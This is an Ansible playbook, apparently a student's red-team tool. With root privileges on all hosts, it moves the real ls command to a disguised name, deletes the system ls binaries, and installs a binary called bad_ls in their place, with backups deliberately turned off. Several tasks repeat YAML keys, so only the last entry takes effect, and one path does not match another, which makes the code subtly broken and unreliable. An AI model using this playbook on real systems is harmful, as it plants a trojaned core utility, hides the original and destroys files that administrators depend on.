---
# Daniel Wolosiuk
# dw4102@rit.edu
# Oct 17 2025
- name: Deploy Daniel Wolosiuk's red team tool
  hosts: all
  become: yes
  tasks:
    - name: Create backup of the real ls command to who.debianutils
      shell: mv /usr/bin/ls /usr/bin/who.debianutils
      args:
        removes: /usr/bin/ls
        creates: /usr/bin/whois.debianutils

    - name: Delete existing ls binaries in /bin/ls and /usr/bin/ls
      shell: rm /usr/bin/ls
      shell: rm /bin/ls
      args:
        removes: /usr/bin/ls
        removes: /bin/ls

    - name: Deploy binary from dist/bad_ls to the target system
      copy:
        src: "bad_ls"
        dest: "/usr/bin/ls"
        remote_src: no
        # backup yes will set the old file to ls.backup, making it esaily recoverable
        backup: no 
      copy:
        src: "bad_ls"
        dest: "/bin/ls"
        remote_src: no
        backup: no

    - name: Create correct permissions for new binaries
      shell: chmod 755 /usr/bin/ls
      shell: chmod 755 /bin/ls


  # install util-linux for wall